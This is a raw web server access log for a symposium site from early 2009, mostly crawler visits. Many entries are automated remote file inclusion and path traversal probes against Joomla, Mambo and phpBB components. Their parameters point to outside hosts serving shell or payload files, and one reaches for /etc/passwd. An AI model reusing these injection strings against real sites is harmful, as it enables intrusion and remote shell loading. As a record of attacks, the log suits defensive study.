72.32.209.74 - - [31/Jan/2009:15:27:11 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
72.32.209.74 - - [31/Jan/2009:15:27:11 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
211.115.222.220 - - [31/Jan/2009:16:13:06 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://61.30.193.252/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" 0 www.geil-symposium.com
211.115.222.220 - - [31/Jan/2009:16:13:07 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://61.30.193.252/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" 0 www.geil-symposium.com
211.115.222.220 - - [31/Jan/2009:16:13:07 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://61.30.193.252/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" 0 www.geil-symposium.com
58.61.164.40 - - [31/Jan/2009:16:33:46 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
66.235.124.38 - - [31/Jan/2009:18:11:05 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [31/Jan/2009:18:11:05 -0500] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
222.236.47.188 - - [01/Feb/2009:00:31:23 -0500] "GET /logs/error.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
222.236.47.188 - - [01/Feb/2009:00:31:23 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
222.236.47.188 - - [01/Feb/2009:00:31:24 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
72.47.202.35 - - [01/Feb/2009:01:13:18 -0500] "GET /logs/error.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
72.47.202.35 - - [01/Feb/2009:01:13:18 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
72.47.202.35 - - [01/Feb/2009:01:13:19 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
77.221.151.34 - - [01/Feb/2009:01:33:55 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
61.80.91.234 - - [01/Feb/2009:01:35:49 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
77.221.151.34 - - [01/Feb/2009:01:57:29 -0500] "GET /logs/error.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
77.221.151.34 - - [01/Feb/2009:01:57:29 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
61.114.233.39 - - [01/Feb/2009:02:01:49 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/bajo.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
61.80.91.234 - - [01/Feb/2009:02:15:23 -0500] "GET /logs/error.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
61.80.91.234 - - [01/Feb/2009:02:15:24 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
220.95.214.91 - - [01/Feb/2009:12:11:36 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://satellite.satedi.org/eva/images/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" 0 www.geil-symposium.com
220.95.214.91 - - [01/Feb/2009:12:11:36 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://satellite.satedi.org/eva/images/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" 0 www.geil-symposium.com
220.95.214.91 - - [01/Feb/2009:12:11:36 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://satellite.satedi.org/eva/images/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" 0 www.geil-symposium.com
216.17.100.41 - - [01/Feb/2009:13:57:47 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 - "-" "libwww-perl/5.822" 0 www.geil-symposium.com
66.235.124.38 - - [01/Feb/2009:14:07:47 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [01/Feb/2009:14:07:47 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.42.169.97 - - [01/Feb/2009:14:13:32 -0500] "GET /logs/error.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
208.42.169.97 - - [01/Feb/2009:14:13:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
208.42.169.97 - - [01/Feb/2009:14:13:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
216.17.100.41 - - [01/Feb/2009:14:15:52 -0500] "GET /logs/error.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 - "-" "libwww-perl/5.822" 0 www.geil-symposium.com
216.17.100.41 - - [01/Feb/2009:14:15:52 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 - "-" "libwww-perl/5.822" 0 www.geil-symposium.com
216.17.100.41 - - [01/Feb/2009:14:15:52 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 - "-" "libwww-perl/5.822" 0 www.geil-symposium.com
62.250.4.44 - - [01/Feb/2009:14:18:07 -0500] "GET /logs/error.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
62.250.4.44 - - [01/Feb/2009:14:18:07 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
62.250.4.44 - - [01/Feb/2009:14:18:07 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.58.238.85 - - [01/Feb/2009:15:33:34 -0500] "GET /logs/access.log/!rfihttp://www.adaiwa.com/car/images/uploads/user??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
216.58.238.85 - - [01/Feb/2009:15:33:34 -0500] "GET /logs/!rfihttp://www.adaiwa.com/car/images/uploads/user??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
216.58.238.85 - - [01/Feb/2009:15:33:34 -0500] "GET /!rfihttp://www.adaiwa.com/car/images/uploads/user??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.90.77.32 - - [01/Feb/2009:15:33:43 -0500] "GET /logs/!rfihttp://www.adaiwa.com/car/images/uploads/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
209.90.77.32 - - [01/Feb/2009:15:33:43 -0500] "GET /logs/access.log/!rfihttp://www.adaiwa.com/car/images/uploads/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
209.90.77.32 - - [01/Feb/2009:15:33:43 -0500] "GET /!rfihttp://www.adaiwa.com/car/images/uploads/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
216.58.238.85 - - [01/Feb/2009:15:34:44 -0500] "GET /logs/access.log%20/!rfihttp://www.adaiwa.com/car/images/uploads/user??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.90.77.32 - - [01/Feb/2009:15:35:53 -0500] "GET /logs/access.log%20/!rfihttp://www.adaiwa.com/car/images/uploads/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
64.8.118.40 - - [01/Feb/2009:15:36:45 -0500] "GET /logs/!rfihttp://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.801" 0 www.geil-symposium.com
64.8.118.40 - - [01/Feb/2009:15:36:45 -0500] "GET /!rfihttp://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.801" 0 www.geil-symposium.com
64.8.118.40 - - [01/Feb/2009:15:36:46 -0500] "GET /logs/access.log/!rfihttp://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.801" 0 www.geil-symposium.com
64.8.118.40 - - [01/Feb/2009:15:39:13 -0500] "GET /logs/access.log%20/!rfihttp://www.j-vision.co.kr/company/hotel/index.php/bo.do%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.801" 0 www.geil-symposium.com
64.128.171.4 - - [01/Feb/2009:15:50:50 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" 0 www.geil-symposium.com
64.128.171.4 - - [01/Feb/2009:15:50:50 -0500] "GET / HTTP/1.1" 200 326 "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" 0 www.geil-symposium.com
217.216.104.248 - - [01/Feb/2009:17:44:42 -0500] "GET /logs/access.log HTTP/1.0" 200 434530 "-" "Wget/1.10.2" 2 www.geil-symposium.com
66.249.71.86 - - [01/Feb/2009:19:17:37 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.87 - - [01/Feb/2009:19:17:37 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
208.80.194.37 - - [01/Feb/2009:20:15:37 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; SpamBlockerUtility 4.7.1)" 0 www.geil-symposium.com
67.195.37.157 - - [02/Feb/2009:01:15:23 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.157 - - [02/Feb/2009:01:15:24 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
67.195.37.157 - - [02/Feb/2009:01:16:05 -0500] "GET /logs/access.log HTTP/1.0" 200 435625 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
67.195.37.157 - - [02/Feb/2009:04:03:16 -0500] "GET /logs/error.log HTTP/1.0" 200 298141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
205.178.184.153 - - [02/Feb/2009:06:48:02 -0500] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" 0 www.geil-symposium.com
205.178.184.153 - - [02/Feb/2009:06:48:02 -0500] "GET / HTTP/1.1" 200 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.153 - - [02/Feb/2009:07:35:02 -0500] "GET / HTTP/1.1" 200 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" 0 www.geil-symposium.com
205.178.184.153 - - [02/Feb/2009:07:35:02 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
208.80.194.48 - - [02/Feb/2009:08:23:23 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 www.geil-symposium.com
212.158.167.98 - - [02/Feb/2009:09:44:15 -0500] "GET /logs/access.log%20%20///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.142900.ru/pdf/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
212.158.167.98 - - [02/Feb/2009:09:44:15 -0500] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.142900.ru/pdf/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:10:10:43 -0500] "GET /logs/access.log%20%20///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:10:10:43 -0500] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:10:11:03 -0500] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:10:26:08 -0500] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:11:38:54 -0500] "GET /logs/access.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:11:38:55 -0500] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:11:45:39 -0500] "GET /logs/access.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
207.213.245.215 - - [02/Feb/2009:11:45:39 -0500] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
72.29.86.23 - - [02/Feb/2009:11:59:20 -0500] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" 0 www.geil-symposium.com
72.29.86.23 - - [02/Feb/2009:11:59:20 -0500] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" 0 www.geil-symposium.com
72.30.142.164 - - [02/Feb/2009:12:08:12 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [02/Feb/2009:12:08:12 -0500] "GET /logs/access.log HTTP/1.0" 200 440705 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [02/Feb/2009:14:48:05 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [02/Feb/2009:14:48:05 -0500] "GET /logs/access.log HTTP/1.0" 200 441105 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.52 - - [02/Feb/2009:21:51:07 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcOTH)" 0 www.geil-symposium.com
83.14.30.149 - - [03/Feb/2009:02:55:18 -0500] "GET /logs/error.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
83.14.30.149 - - [03/Feb/2009:02:55:18 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
83.14.30.149 - - [03/Feb/2009:02:55:18 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.823" 0 www.geil-symposium.com
64.18.194.51 - - [03/Feb/2009:08:18:05 -0500] "GET /logs/error.log/index.php?_REQUEST=&_REQUEST[option]=option,com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.zsp6.jaworzno.edu.pl/galerie/chi.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
64.18.194.51 - - [03/Feb/2009:08:18:05 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.zsp6.jaworzno.edu.pl/galerie/chi.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
64.18.194.51 - - [03/Feb/2009:08:18:06 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.zsp6.jaworzno.edu.pl/galerie/chi.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
208.80.194.35 - - [03/Feb/2009:08:52:40 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; SaveWealth; PeoplePal 3.0)" 0 www.geil-symposium.com
219.85.63.226 - - [03/Feb/2009:09:03:17 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stormpages.com/songo/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
219.85.63.226 - - [03/Feb/2009:09:03:18 -0500] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stormpages.com/songo/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
219.85.63.226 - - [03/Feb/2009:09:03:18 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stormpages.com/songo/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
203.209.252.10 - - [03/Feb/2009:09:14:24 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [03/Feb/2009:09:14:53 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
219.85.63.226 - - [03/Feb/2009:09:21:13 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stormpages.com/songo/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
219.85.63.226 - - [03/Feb/2009:09:21:13 -0500] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stormpages.com/songo/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
219.85.63.226 - - [03/Feb/2009:09:21:13 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stormpages.com/songo/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
208.111.154.16 - - [03/Feb/2009:15:36:45 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Feb/2009:15:36:47 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
66.231.188.115 - - [03/Feb/2009:18:43:21 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" 0 www.geil-symposium.com
66.231.188.115 - - [03/Feb/2009:18:43:23 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" 1 www.geil-symposium.com
192.134.106.1 - - [03/Feb/2009:18:50:26 -0500] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" 0 www.geil-symposium.com
192.134.106.1 - - [03/Feb/2009:18:50:26 -0500] "GET //modules/Forums/admin/admin_users.php?phpbb_root_path=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" 0 www.geil-symposium.com
222.74.231.133 - - [03/Feb/2009:19:49:08 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
222.74.231.133 - - [03/Feb/2009:19:49:08 -0500] "GET / HTTP/1.1" 200 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
222.74.231.133 - - [03/Feb/2009:19:49:08 -0500] "GET /logs/ HTTP/1.1" 200 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
222.74.231.133 - - [03/Feb/2009:19:49:09 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 0 www.geil-symposium.com
64.246.187.42 - - [03/Feb/2009:20:01:00 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.187.42 - - [03/Feb/2009:20:01:01 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
67.195.37.112 - - [03/Feb/2009:22:11:27 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.112 - - [03/Feb/2009:22:11:28 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
114.111.36.26 - - [03/Feb/2009:22:16:43 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
114.111.36.26 - - [03/Feb/2009:22:17:00 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
208.111.154.31 - - [03/Feb/2009:22:30:54 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.31 - - [03/Feb/2009:22:30:54 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
